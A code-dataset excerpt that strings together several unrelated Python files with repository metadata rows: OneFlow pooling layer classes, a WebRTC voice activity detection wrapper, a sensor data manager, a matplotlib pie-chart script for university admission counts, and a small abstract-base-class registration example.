from oneflow.compatible.single_client.nn.common_types import (
_size_1_t,
_size_2_t,
_size_3_t,
)
from oneflow.compatible.single_client.nn.module import Module
from oneflow.compatible.single_client.nn.modules.utils import _pair, _single, _triple
from oneflow.compatible.single_client.ops.nn_ops import (
calc_pool_padding,
get_dhw_offset,
)
class AvgPool1d(Module):
"""Applies a 1D average pooling over an input signal composed of several input planes.
In the simplest case, the output value of the layer with input size :math:`(N, C, H, W)`,
output :math:`(N, C, H_{out}, W_{out})` and `kernel_size` :math:`k`
can be precisely described as:
.. math::
out(N_i, C_j, l) = \\frac{1}{k} \\sum_{m=0}^{k-1}
input(N_i, C_j, stride[0] \\times h + m, stride*l + m)
If padding is non-zero, then the input is implicitly zero-padded on both sides for padding number of points.
The parameters kernel_size, stride, padding can each be an int or a one-element tuple.
Note:
When ceil_mode=True, sliding windows are allowed to go off-bounds if they start within the left padding or the
input. Sliding windows that would start in the right padded region are ignored.
Args:
kernel_size: the size of the window.
strides: the stride of the window. Default value is kernel_size.
padding: implicit zero padding to be added on both sides.
ceil_mode: when True, will use ceil instead of floor to compute the output shape.
count_include_pad: when True, will include the zero-padding in the averaging calculation.
# TODO: fix cuDNN bugs in pooling_1d
"""
def __init__(
self,
kernel_size: _size_1_t,
stride: Optional[_size_1_t] = None,
padding: _size_1_t = 0,
ceil_mode: bool = False,
count_include_pad: Optional[bool] = None,
name: Optional[str] = None,
):
raise NotImplementedError
class AvgPool2d(Module):
"""Performs the 2d-average pooling on the input.
In the simplest case, the output value of the layer with input size :math:`(N, C, H, W)`,
output :math:`(N, C, H_{out}, W_{out})` and `kernel_size` :math:`(kH, kW)`
can be precisely described as:
.. math::
out(N_i, C_j, h, w) = \\frac{1}{kH * kW} \\sum_{m=0}^{kH-1} \\sum_{n=0}^{kW-1}
input(N_i, C_j, stride[0] \\times h + m, stride[1] \\times w + n)
Args:
kernel_size (Union[int, Tuple[int, int]]): An int or list of ints that has length 1, 2. The size of the window for each dimension of the input Tensor.
strides (Union[int, Tuple[int, int]]): An int or list of ints that has length 1, 2. The stride of the sliding window for each dimension of the input Tensor.
padding (Tuple[int, int]): An int or list of ints that has length 1, 2. Implicit zero padding to be added on both sides.
ceil_mode (bool, default to False): When True, will use ceil instead of floor to compute the output shape.
For example:
.. code-block:: python
import oneflow.compatible.single_client.experimental as flow
import numpy as np
of_avgpool2d = flow.nn.AvgPool2d(
kernel_size=(3, 2),
padding=0,
stride=(2, 1),
)
x = flow.Tensor(shape=(1, 1, 10, 10))
of_y = of_avgpool2d(x)
"""
def __init__(
self,
kernel_size: _size_2_t,
stride: Optional[_size_2_t] = None,
padding: _size_2_t = 0,
ceil_mode: bool = False,
count_include_pad: Optional[bool] = None,
divisor_override: Optional[int] = None,
name: Optional[str] = None,
):
super().__init__()
self.kernel_size = _pair(kernel_size)
self.stride = _pair(stride) if stride is not None else kernel_size
assert isinstance(padding, int) or isinstance(
padding, tuple
), "padding can only int int or tuple of 2 ints."
padding = _pair(padding)
padding = [0, 0, *padding]
assert count_include_pad is None, "count_include_pad not supported yet"
assert divisor_override is None, "divisor_override not supported yet"
self._channel_pos = "channels_first"
(self._padding_type, _pads_list) = calc_pool_padding(
padding, get_dhw_offset(self._channel_pos), 2
)
self._padding_before = [pad[0] for pad in _pads_list]
self._padding_after = [pad[1] for pad in _pads_list]
self.ceil_mode = ceil_mode
def forward(self, x):
res = flow.F.avg_pool_2d(
x,
kernel_size=self.kernel_size,
stride=self.stride,
padding=self._padding_type,
padding_before=self._padding_before,
padding_after=self._padding_after,
ceil_mode=self.ceil_mode,
data_format=self._channel_pos,
)
return res
class AvgPool3d(Module):
"""Applies a 3D average pooling over an input signal composed of several input planes.
In the simplest case, the output value of the layer with input size :math:`(N, C, D, H, W)`,
output :math:`(N, C, D_{out}, H_{out}, W_{out})` and `kernel_size` :math:`(kD, kH, kW)`
can be precisely described as:
.. math::
out(N_i, C_j, d, h, w) = \\frac{1}{kD * kH * kW } \\sum_{k=0}^{kD-1} \\sum_{m=0}^{kH-1} \\sum_{n=0}^{kW-1}
input(N_i, C_j, stride[0] \\times d + k, stride[1] \\times h + m, stride[2] \\times w + n)
If padding is non-zero, then the input is implicitly zero-padded on all three sides for padding number of points.
Note:
When ceil_mode=True, sliding windows are allowed to go off-bounds if they start within the left padding or the
input. Sliding windows that would start in the right padded region are ignored.
Args:
kernel_size: the size of the window.
strides: the stride of the window. Default value is kernel_size.
padding: implicit zero padding to be added on all three sides.
ceil_mode: when True, will use ceil instead of floor to compute the output shape.
count_include_pad: when True, will include the zero-padding in the averaging calculation.
divisor_override: if specified, it will be used as divisor, otherwise kernel_size will be used.
Shape:
- Input: :math:`(N, C, D_{in}, H_{in}, W_{in})`
- Output: :math:`(N, C, D_{out}, H_{out}, W_{out})`, where
.. math::
D_{out} = \\left\\lfloor\\frac{D_{in} + 2 \\times \\text{padding}[0] - \\text{kernel_size}[0]}{\\text{stride}[0]} + 1\\right\\rfloor
.. math::
H_{out} = \\left\\lfloor\\frac{H_{in} + 2 \\times \\text{padding}[1] - \\text{kernel_size}[1]}{\\text{stride}[1]} + 1\\right\\rfloor
.. math::
W_{out} = \\left\\lfloor\\frac{W_{in} + 2 \\times \\text{padding}[2] - \\text{kernel_size}[2]}{\\text{stride}[2]} + 1\\right\\rfloor
For example:
.. code-block:: python
>>> import oneflow.compatible.single_client.experimental as flow
>>> import numpy as np
>>> flow.enable_eager_execution()
>>> inputarr = np.random.randn(9, 7, 11, 32, 20)
>>> of_avgpool3d = flow.nn.AvgPool3d(kernel_size=(2,2,2),padding=(0,0,0),stride=(1,1,1),)
>>> x = flow.Tensor(inputarr)
>>> y = of_avgpool3d(x)
"""
def __init__(
self,
kernel_size: _size_3_t,
stride: Optional[_size_3_t] = None,
padding: _size_3_t = 0,
ceil_mode: bool = False,
count_include_pad: Optional[bool] = None,
divisor_override: Optional[int] = None,
):
super().__init__()
kernel_size = _pair(kernel_size)
stride = _pair(stride) if stride is not None else kernel_size
assert padding == (0, 0, 0), "padding>0 not supported yet"
assert isinstance(padding, int) or isinstance(
padding, tuple
), "padding can only int int or tuple of 3 ints."
padding = _pair(padding)
padding = [0, 0, *padding]
assert count_include_pad is None, "count_include_pad not supported yet"
assert divisor_override is None, "divisor_override not supported yet"
_channel_pos = "channels_first"
(_padding_type, _pads_list) = calc_pool_padding(
padding, get_dhw_offset(_channel_pos), 3
)
_padding_before = [pad[0] for pad in _pads_list]
_padding_after = [pad[1] for pad in _pads_list]
self._op = (
flow.builtin_op("avg_pool_3d")
.Attr("data_format", _channel_pos)
.Attr("pool_size", kernel_size)
.Attr("strides", stride)
.Attr("ceil_mode", ceil_mode)
.Attr("padding", _padding_type)
.Attr("padding_before", _padding_before)
.Attr("padding_after", _padding_after)
.Input("x")
.Output("y")
.Build()
)
def forward(self, x):
res = self._op(x)[0]
return res
class MaxPool1d(Module):
"""The interface is consistent with PyTorch.
The documentation is referenced from: https://pytorch.org/docs/stable/generated/torch.nn.MaxPool1d.html#torch.nn.MaxPool1d
Applies a 1D max pooling over an input signal composed of several input planes.
In the simplest case, the output value of the layer with input size :math:`(N, C, L)`
and output :math:`(N, C, L_{out})` can be precisely described as:
.. math::
out(N_i, C_j, k) = \\max_{m=0, \\ldots, \\text{kernel\\_size} - 1}
input(N_i, C_j, stride \\times k + m)
If :attr:`padding` is non-zero, then the input is implicitly padded with minimum value on both sides
for :attr:`padding` number of points. :attr:`dilation` is the stride between the elements within the
sliding window. This `link`_ has a nice visualization of the pooling parameters.
Note:
When ceil_mode=True, sliding windows are allowed to go off-bounds if they start within the left padding
or the input. Sliding windows that would start in the right padded region are ignored.
Args:
kernel_size: The size of the sliding window, must be > 0.
stride: The stride of the sliding window, must be > 0. Default value is :attr:`kernel_size`.
padding: Implicit negative infinity padding to be added on both sides, must be >= 0 and <= kernel_size / 2.
dilation: The stride between elements within a sliding window, must be > 0.
return_indices: If ``True``, will return the argmax along with the max values.
Useful for :class:`torch.nn.MaxUnpool1d` later
ceil_mode: If ``True``, will use `ceil` instead of `floor` to compute the output shape. This
ensures that every element in the input tensor is covered by a sliding window.
Shape:
- Input: :math:`(N, C, L_{in})`
- Output: :math:`(N, C, L_{out})`, where
.. math::
L_{out} = \\left\\lfloor \\frac{L_{in} + 2 \\times \\text{padding} - \\text{dilation}
\\times (\\text{kernel_size} - 1) - 1}{\\text{stride}} + 1\\right\\rfloor
"""
def __init__(
self,
kernel_size: _size_1_t,
stride: Optional[_size_1_t] = None,
padding: _size_1_t = 0,
dilation: _size_1_t = 1,
return_indices: bool = False,
ceil_mode: bool = False,
):
raise NotImplementedError
class MaxPool2d(Module):
"""The interface is consistent with PyTorch.
The documentation is referenced from: https://pytorch.org/docs/stable/generated/torch.nn.MaxPool2d.html#torch.nn.MaxPool2d
Applies a 2D max pooling over an input signal composed of several input planes.
In the simplest case, the output value of the layer with input size :math:`(N, C, H, W)`,
output :math:`(N, C, H_{out}, W_{out})` and :attr:`kernel_size` :math:`(kH, kW)`
can be precisely described as:
.. math::
\\begin{aligned}
out(N_i, C_j, h, w) ={} & \\max_{m=0, \\ldots, kH-1} \\max_{n=0, \\ldots, kW-1} \\\\
& \\text{input}(N_i, C_j, \\text{stride[0]} \\times h + m,
\\text{stride[1]} \\times w + n)
\\end{aligned}
If :attr:`padding` is non-zero, then the input is implicitly minimum value padded on both sides
for :attr:`padding` number of points. :attr:`dilation` controls the spacing between the kernel points.
It is harder to describe, but this `link`_ has a nice visualization of what :attr:`dilation` does.
Note:
When ceil_mode=True, sliding windows are allowed to go off-bounds if they start within the left padding
or the input. Sliding windows that would start in the right padded region are ignored.
The parameters :attr:`kernel_size`, :attr:`stride`, :attr:`padding`, :attr:`dilation` can either be:
- a single ``int`` -- in which case the same value is used for the height and width dimension
- a ``tuple`` of two ints -- in which case, the first `int` is used for the height dimension,
and the second `int` for the width dimension
Args:
kernel_size: the size of the window to take a max over
stride: the stride of the window. Default value is :attr:`kernel_size`
padding: implicit minimum value padding to be added on both sides
dilation: a parameter that controls the stride of elements in the window
return_indices: if ``True``, will return the max indices along with the outputs.
Useful for :class:`torch.nn.MaxUnpool2d` later
ceil_mode: when True, will use `ceil` instead of `floor` to compute the output shape
Shape:
- Input: :math:`(N, C, H_{in}, W_{in})`
- Output: :math:`(N, C, H_{out}, W_{out})`, where
.. math::
H_{out} = \\left\\lfloor\\frac{H_{in} + 2 * \\text{padding[0]} - \\text{dilation[0]}
\\times (\\text{kernel_size[0]} - 1) - 1}{\\text{stride[0]}} + 1\\right\\rfloor
.. math::
W_{out} = \\left\\lfloor\\frac{W_{in} + 2 * \\text{padding[1]} - \\text{dilation[1]}
\\times (\\text{kernel_size[1]} - 1) - 1}{\\text{stride[1]}} + 1\\right\\rfloor
For example:
.. code-block:: python
>>> import oneflow.compatible.single_client.experimental as flow
>>> import numpy as np
>>> flow.enable_eager_execution()
>>> kernel_size, stride, padding = (3, 3), (1, 1), (1, 2)
>>> m = flow.nn.MaxPool2d(kernel_size, stride, padding)
>>> np.random.seed(0)
>>> x = flow.Tensor(np.random.rand(1, 1, 5, 3))
>>> y = m(x)
>>> y #doctest: +ELLIPSIS
tensor([[[[0.5488, 0.7152, 0.7152, 0.7152, 0.6459],
...
[0.568 , 0.9256, 0.9256, 0.9256, 0.5289]]]], dtype=oneflow.float32)
>>> kernel_size, stride, padding = (2, 3), (4, 5), (1, 2)
>>> m = flow.nn.MaxPool2d(kernel_size, stride, padding)
>>> x = flow.Tensor(np.random.randn(9, 7, 32, 20))
>>> y = m(x)
>>> y.size()
flow.Size([9, 7, 9, 5])
"""
def __init__(
self,
kernel_size: _size_2_t,
stride: Optional[_size_2_t] = None,
padding: _size_2_t = 0,
dilation: _size_2_t = 1,
return_indices: bool = False,
ceil_mode: bool = False,
):
super().__init__()
self.kernel_size = _pair(kernel_size)
self.strides = _pair(stride) if stride is not None else kernel_size
data_format = "NCHW"
self.channel_pos = (
"channels_last" if data_format == "NHWC" else "channels_first"
)
assert return_indices is False, "Only support return_indices==False for now!"
assert dilation == 1 or dilation == (1, 1), "Only support dilation==1 for now!"
padding = _pair(padding)
if len(padding) == 2:
if data_format == "NCHW":
padding = (0, 0, padding[0], padding[1])
else:
raise ValueError("error padding param!")
else:
raise ValueError("error padding param!")
(self.padding_type, pads_list) = calc_pool_padding(
padding, get_dhw_offset(self.channel_pos), 2
)
self.padding_before = [pad[0] for pad in pads_list]
self.padding_after = [pad[1] for pad in pads_list]
self.ceil_mode = ceil_mode
def forward(self, x):
return flow.F.max_pool_2d(
x,
kernel_size=self.kernel_size,
stride=self.strides,
padding=self.padding_type,
padding_before=self.padding_before,
padding_after=self.padding_after,
ceil_mode=self.ceil_mode,
data_format=self.channel_pos,
)
class MaxPool3d(Module):
"""The interface is consistent with PyTorch.
The documentation is referenced from: https://pytorch.org/docs/stable/generated/torch.nn.MaxPool3d.html#torch.nn.MaxPool3d
Applies a 3D max pooling over an input signal composed of several input planes.
In the simplest case, the output value of the layer with input size :math:`(N, C, D, H, W)`,
output :math:`(N, C, D_{out}, H_{out}, W_{out})` and :attr:`kernel_size` :math:`(kD, kH, kW)`
can be precisely described as:
.. math::
\\begin{aligned}
\\text{out}(N_i, C_j, d, h, w) ={} & \\max_{k=0, \\ldots, kD-1} \\max_{m=0, \\ldots, kH-1} \\max_{n=0, \\ldots, kW-1} \\\\
& \\text{input}(N_i, C_j, \\text{stride[0]} \\times d + k,
\\text{stride[1]} \\times h + m, \\text{stride[2]} \\times w + n)
\\end{aligned}
If :attr:`padding` is non-zero, then the input is implicitly minimum value on both sides
for :attr:`padding` number of points. :attr:`dilation` controls the spacing between the kernel points.
It is harder to describe, but this `link`_ has a nice visualization of what :attr:`dilation` does.
Note:
When ceil_mode=True, sliding windows are allowed to go off-bounds if they start within the left padding
or the input. Sliding windows that would start in the right padded region are ignored.
The parameters :attr:`kernel_size`, :attr:`stride`, :attr:`padding`, :attr:`dilation` can either be:
- a single ``int`` -- in which case the same value is used for the depth, height and width dimension
- a ``tuple`` of three ints -- in which case, the first `int` is used for the depth dimension,
the second `int` for the height dimension and the third `int` for the width dimension
Args:
kernel_size: the size of the window to take a max over
stride: the stride of the window. Default value is :attr:`kernel_size`
padding: implicit minimum value padding to be added on all three sides
dilation: a parameter that controls the stride of elements in the window
return_indices: if ``True``, will return the max indices along with the outputs.
Useful for :class:`torch.nn.MaxUnpool3d` later
ceil_mode: when True, will use `ceil` instead of `floor` to compute the output shape
Shape:
- Input: :math:`(N, C, D_{in}, H_{in}, W_{in})`
- Output: :math:`(N, C, D_{out}, H_{out}, W_{out})`, where
.. math::
D_{out} = \\left\\lfloor\\frac{D_{in} + 2 \\times \\text{padding}[0] - \\text{dilation}[0] \\times
(\\text{kernel_size}[0] - 1) - 1}{\\text{stride}[0]} + 1\\right\\rfloor
.. math::
H_{out} = \\left\\lfloor\\frac{H_{in} + 2 \\times \\text{padding}[1] - \\text{dilation}[1] \\times
(\\text{kernel_size}[1] - 1) - 1}{\\text{stride}[1]} + 1\\right\\rfloor
.. math::
W_{out} = \\left\\lfloor\\frac{W_{in} + 2 \\times \\text{padding}[2] - \\text{dilation}[2] \\times
(\\text{kernel_size}[2] - 1) - 1}{\\text{stride}[2]} + 1\\right\\rfloor
For example:
.. code-block:: python
>>> import oneflow.compatible.single_client.experimental as flow
>>> import numpy as np
>>> flow.enable_eager_execution()
>>> kernel_size, stride, padding = (3, 3, 3), (1, 1, 1), (1, 1, 2)
>>> m = flow.nn.MaxPool3d(kernel_size, stride, padding)
>>> np.random.seed(0)
>>> x = flow.Tensor(np.random.rand(1, 1, 3, 5, 3))
>>> y = m(x)
>>> y #doctest: +ELLIPSIS
tensor([[[[[0.7782, 0.87 , 0.9786, 0.9786, 0.9786],
...
[0.9447, 0.9447, 0.9447, 0.6668, 0.6668]]]]], dtype=oneflow.float32)
>>> kernel_size, stride, padding = (2, 2, 3), (3, 4, 5), (2, 1, 2)
>>> m = flow.nn.MaxPool3d(kernel_size, stride, padding)
>>> x = flow.Tensor(np.random.randn(9, 7, 11, 32, 20))
>>> y = m(x)
>>> y.size()
flow.Size([9, 7, 5, 9, 5])
"""
def __init__(
self,
kernel_size: _size_3_t,
stride: Optional[_size_3_t] = None,
padding: _size_3_t = 0,
dilation: _size_3_t = 1,
return_indices: bool = False,
ceil_mode: bool = False,
):
super().__init__()
kernel_size = _triple(kernel_size)
strides = _triple(stride) if stride is not None else kernel_size
data_format = "NCDHW"
channel_pos = "channels_last" if data_format == "NDHWC" else "channels_first"
assert return_indices is False, "Only support return_indices==False for now!"
assert dilation == 1 or dilation == (
1,
1,
1,
), "Only support dilation==1 for now!"
padding = _triple(padding)
if len(padding) == 3:
if data_format == "NCDHW":
padding = (0, 0, padding[0], padding[1], padding[2])
else:
raise ValueError("error padding param!")
else:
raise ValueError("error padding param!")
(padding_type, pads_list) = calc_pool_padding(
padding, get_dhw_offset(channel_pos), 3
)
padding_before = [pad[0] for pad in pads_list]
padding_after = [pad[1] for pad in pads_list]
self._op = (
flow.builtin_op("max_pool_3d")
.Attr("data_format", channel_pos)
.Attr("pool_size", kernel_size)
.Attr("strides", strides)
.Attr("ceil_mode", ceil_mode)
.Attr("padding", padding_type)
.Attr("padding_before", padding_before)
.Attr("padding_after", padding_after)
.Input("x")
.Output("y")
.Build()
)
def forward(self, x):
return self._op(x)[0]
if __name__ == "__main__":
import doctest
doctest.testmod(raise_on_error=True)
| 42.203901 | 164 | 0.60026 |
f40d32e548139f9fb4eba3fe304297507dda91c5
| 6,217 |
py
|
Python
|
python/en/archive/topics/temp/audio/voice_activity_detection/src/webrt_vad.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/topics/temp/audio/voice_activity_detection/src/webrt_vad.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/topics/temp/audio/voice_activity_detection/src/webrt_vad.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
'''
webrt_vad.py
Prerequisite:
+ Install webrtcvad
$ pip install webrtcvad
+ Install other packages such as numpy, matplotlib, and scipy
$ pip install package_name
fs sampling rate
py-webrtcvad, https://github.com/wiseman/py-webrtcvad/
Voice activity detection example, https://www.kaggle.com/holzner/voice-activity-detection-example
[This example didn't run, so I had to fix some parts.]
'''
import os
import numpy as np
import matplotlib.pyplot as plt
import webrtcvad
import struct
import IPython.display as ipd
from scipy.io import wavfile
class WebRtVad:
# This class is assumed to be a singleton.
# Constructor
def __init__( self ):
self.vad = webrtcvad.Vad()
self.vad.set_mode(3)
self.configure()
def configure( self ):
self.window_duration = 0.03 # duration in seconds
self.bytes_per_sample = 2
def test_run( self ):
# Read in the input .wav file
#file = './english-0.wav'
if __name__ == '__main__':
file = './audio_files/english-0.wav'
else:
file = './vad/audio_files/english-0.wav'
samples, fs = self.read_wav( file )
num_samples = len(samples) # 57920
samples_per_window = int( self.window_duration * fs + 0.5 )
# Verify the input file
self.play_audio( samples, fs )
self.plot( samples, title='Input Signal' )
norm_samples, y_max = self.normalize( samples )
self.play_audio( norm_samples, fs )
self.plot( norm_samples, title='Normalized Input Signal' )
# Apply VAD
# CAUTION:
# samples shouldn't be normalized because the format h is short int.
# So pack expects a sequence of integers as the input.
# Otherwise,
# *** struct.error: required argument is not an integer
raw_samples = struct.pack( "%dh" % len(samples), *samples)
segments = self.get_segments( raw_samples, num_samples, fs, samples_per_window )
self.plot_segments( norm_samples, segments )
def read_wav( self, file ):
fs, samples = wavfile.read( file )
return samples, fs
def normalize( self, samples ):
'''
Peak normalization of the input audio signal
i.e. normalize the input audio signal or data with the maximum value
'''
y_max = max( abs(samples) )
norm_samples = samples / y_max
return norm_samples, y_max
def play_audio( self, samples, fs ):
ipd.Audio( samples, rate=fs )
def plot( self, samples, title='Input File' ):
plt.figure(figsize = (10,7))
plt.plot( samples )
plt.grid()
plt.title( title )
plt.xlabel( 'sample' )
plt.ylabel( 'Amplitude' )
def get_segments( self, raw_samples, num_samples, fs, samples_per_window ):
'''
segment_dict is a dictionary of {start, stop, is_speech} for a window.
Each window's sample starts from start and ends at stop.
Byte-wise, a window starts from from_ and ends at to.
segments_dicts is a collection of all the windows.
'''
segments_dicts = []
for start in np.arange(0, num_samples, samples_per_window):
from_ = start * self.bytes_per_sample
stop = min( start + samples_per_window, num_samples ) # For the last frame
to = stop * self.bytes_per_sample
this_window = raw_samples[ from_:to ]
# TODO: Fix an error from here
# ipdb> webrtcvad.Error: Error while processing frame
is_speech = self.vad.is_speech( this_window, sample_rate=fs )
segment_dict = dict( start=start, stop=stop, is_speech=is_speech)
segments_dicts.append( segment_dict )
return segments_dicts
def plot_segments( self, samples, segments ):
self.plot( samples, 'Speech Samples' )
peak_value = max( abs(samples) )
# Overlay the speech segments over the input waveform
for segment in segments:
if segment['is_speech']:
x = [ segment['start'], segment['stop'] - 1]
y = [ peak_value, peak_value ]
#y = [ 1, 1 ]
# plot segment identifed as speech
plt.plot(x, y, color = 'orange')
plt.show()
def run( self, input_, num_samples, format_='samples' ):
if format_ == 'file':
assert isinstance( input_, str ), 'When the format is file, input_ must be a string.'
# Read in the input .wav file
file = input_
#file = './english-0.wav'
#file = '../audio_files/english-0.wav'
samples, fs = self.read_wav( file )
elif format_ == 'samples':
# assert isinstance( input_[0], numpy.ndarray ) numpy.ndarray
assert isinstance( input_[1], int ), 'input_[1] must be sampling rate which is an integer.'
samples = input_[0]
fs = input_[1]
data_type = samples.dtype.name
if data_type == 'float64':
samples = samples.astype(int)
# Note samples must be integers ('int16'?)
samples_per_window = int( self.window_duration * fs + 0.5 )
# Verify the input file
# if self.config.debug:
# self.play_audio( samples, fs )
# self.plot( samples, title='Input Signal' )
# self.play_audio( norm_samples, fs )
# self.plot( norm_samples, title='Normalized Input Signal' )
# Apply VAD
# CAUTION:
# samples shouldn't be normalized because the format h is short int.
# So pack expects a sequence of integers as the input.
# Otherwise,
# *** struct.error: required argument is not an integer
raw_samples = struct.pack( "%dh" % num_samples, *samples)
segments = self.get_segments( raw_samples, num_samples, fs, samples_per_window )
self.plot_segments( samples, segments )
if __name__ == '__main__':
vad = WebRtVad()
vad.test_run()
| 36.356725 | 103 | 0.593695 |
be2f8c45e2d5ae5d90af28ed25e26cb678b1ec6a
| 2,391 |
py
|
Python
|
20-fs-ias-lec/groups/09-loraSense/SenseLink/LoRaSense - Interface/sensui/SensorManager.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 8 |
2020-03-17T21:12:18.000Z
|
2021-12-12T15:55:54.000Z
|
20-fs-ias-lec/groups/09-loraSense/SenseLink/LoRaSense - Interface/sensui/SensorManager.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 2 |
2021-07-19T06:18:43.000Z
|
2022-02-10T12:17:58.000Z
|
20-fs-ias-lec/groups/09-loraSense/SenseLink/LoRaSense - Interface/sensui/SensorManager.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 25 |
2020-03-20T09:32:45.000Z
|
2021-07-18T18:12:59.000Z
|
class SensorManager:
class Sensor:
def __init__(self, id, name, sType, unit):
self.id = id
self.name = name
self.sType = sType
self.unit = unit
sensorTypes = {
"T_celcius": Sensor("T_celcius", "Temperatur", "T", "°C"),
"P_hPa": Sensor("P_hPa", "Luftdruck", "P", "hPa"),
"rH": Sensor("rH", "Luftfeuchtigkeit", "rH", "%"),
"J_lumen": Sensor("J_lumen", "Lichtstrom", "J", "%")
}
INDEX_TIMESTAMP = 0
INDEX_VALUE = 1
def __init__(self, callbackDataUpdated, callbackNodesUpdated):
self.__callbackDataUpdated = callbackDataUpdated
self.__callbackNodesUpdated = callbackNodesUpdated
'''
values = {
nodeId = {
sensorId = [
[t1, t2, t3],
[v1, v2, v3]
]
}
}
'''
self.__values = {}
@staticmethod
def getUnit(sensorId):
if sensorId in SensorManager.sensorTypes:
return SensorManager.sensorTypes[sensorId].unit
def addData(self, nodeId, sensorId, value, timestamp):
if value is None or timestamp is None:
return
if nodeId not in self.__values:
self.__values[nodeId] = {sensorId: [[timestamp], [value]]}
self.__callbackNodesUpdated(nodeId)
elif sensorId not in self.__values[nodeId]:
self.__values[nodeId][sensorId] = [[timestamp], [value]]
else:
self.__values[nodeId][sensorId][SensorManager.INDEX_TIMESTAMP].append(timestamp)
self.__values[nodeId][sensorId][SensorManager.INDEX_VALUE].append(value)
# TODO: Fire event
self.__callbackDataUpdated(nodeId, sensorId)
def dataReference(self, nodeId, sensorId):
if nodeId not in self.__values:
data = [[], []]
self.__values[nodeId] = {sensorId: data}
elif sensorId not in self.__values[nodeId]:
data = [[], []]
self.__values[nodeId][sensorId] = data
else:
data = self.__values[nodeId][sensorId]
return data
def getData(self, nodeId, sensorId):
if nodeId not in self.__values or sensorId not in self.__values[nodeId]:
return None
return self.__values[nodeId][sensorId]
| 31.051948 | 92 | 0.557926 |
be990e57313210c67d9f706a8582347597f1840b
| 2,078 |
py
|
Python
|
BigData_exp/exp3/exp3/my_pie.py
|
DolorHunter/hfut-exp-archived
|
c67e26c1f4fba550c8974eaba10dfa302b928868
|
[
"BSD-2-Clause"
] | 12 |
2020-12-07T05:49:05.000Z
|
2022-03-25T09:09:36.000Z
|
BigData_exp/exp3/exp3/my_pie.py
|
DolorHunter/hfut-exp
|
c67e26c1f4fba550c8974eaba10dfa302b928868
|
[
"BSD-2-Clause"
] | null | null | null |
BigData_exp/exp3/exp3/my_pie.py
|
DolorHunter/hfut-exp
|
c67e26c1f4fba550c8974eaba10dfa302b928868
|
[
"BSD-2-Clause"
] | 1 |
2021-01-08T08:53:53.000Z
|
2021-01-08T08:53:53.000Z
|
from matplotlib import pyplot as plt
from matplotlib import cm
import numpy as np
import my_count
plt.rcParams['font.sans-serif'] = ['SimHei'] # 解决中文乱码
def school_pie():
labels = []
sizes = []
othersize = 0
explode = (0.05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
for (school, times), i in zip(my_count.schooltimes_list, range(999)):
if i < 100:
labels.append(school)
sizes.append(times)
else:
othersize += times
labels.append('其他')
sizes.append(othersize)
colors = cm.rainbow(1 - np.arange(len(sizes)) / len(sizes))
plt.figure(figsize=(35, 25))
plt.pie(sizes, explode=explode, labels=labels, autopct='%1.1f%%', colors=colors)
plt.title('2017年双十学子高考录学校分布', fontsize='large', fontweight='bold')
plt.legend(loc='upper right')
plt.axis('equal')
plt.savefig('school_pie.png')
plt.show()
def schooltypes_pie():
labels = []
sizes = []
explode = (0.05, 0, 0, 0, 0, 0, 0, 0, 0)
for (schooltypes, times) in my_count.schooltypestimes_list:
labels.append(schooltypes)
sizes.append(times)
colors = cm.rainbow(1 - np.arange(len(sizes)) / len(sizes))
plt.figure(figsize=(20, 18))
plt.pie(sizes, explode=explode, labels=labels, autopct='%1.1f%%', colors=colors)
plt.title('2017年双十学子高考录学校类型分布', fontsize='large', fontweight='bold')
plt.legend(loc='upper left')
plt.axis('equal')
plt.savefig('schooltypes_pie.png')
plt.show()
def main():
my_count.count(my_count.schooltimes, my_count.schooltypestimes,
my_count.schooltimes_list, my_count.schooltypestimes_list)
school_pie()
schooltypes_pie()
if __name__ == '__main__':
main()
| 33.516129 | 84 | 0.567372 |
fe6233507e6954c640851a443fe9f83f5ba4fd02
| 462 |
py
|
Python
|
python/abc/abc_register.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/abc/abc_register.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/abc/abc_register.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
import abc
from abc_base import PluginBase
class LocalBaseClass:
pass
@PluginBase.register
class RegisterImplementation(LocalBaseClass):
def load(self, input):
return input.read()
def save(self, output, data):
return output.write(data)
if __name__ == "__main__":
print("Subclass:", issubclass(RegisterImplementation, PluginBase))
print("Instance:", isinstance(RegisterImplementation(), PluginBase))
| 22 | 73 | 0.692641 |
43a274f75c99b891819d3091e48fdb226c5fd96a
| 2,660 |
py
|
Python
|
docs/labs/lab5/solutions/solution1.py
|
yankeesong/2021-CS109A
|
0fea6b4411092446719d09379c6a12815aa91ab2
|
[
"MIT"
] | 19 |
2021-08-29T21:23:48.000Z
|
2022-03-16T14:38:25.000Z
|
docs/labs/lab5/solutions/solution1.py
|
SBalas/2021-CS109A
|
0f57c3d80b7cef99d660f6a77c0166cffc1253e8
|
[
"MIT"
] | null | null | null |
docs/labs/lab5/solutions/solution1.py
|
SBalas/2021-CS109A
|
0f57c3d80b7cef99d660f6a77c0166cffc1253e8
|
[
"MIT"
] | 22 |
2021-09-01T13:03:05.000Z
|
2022-03-31T14:34:36.000Z
|
def preprocess(df, standardize = False):
"""Splits the data into training and validation sets.
arguments:
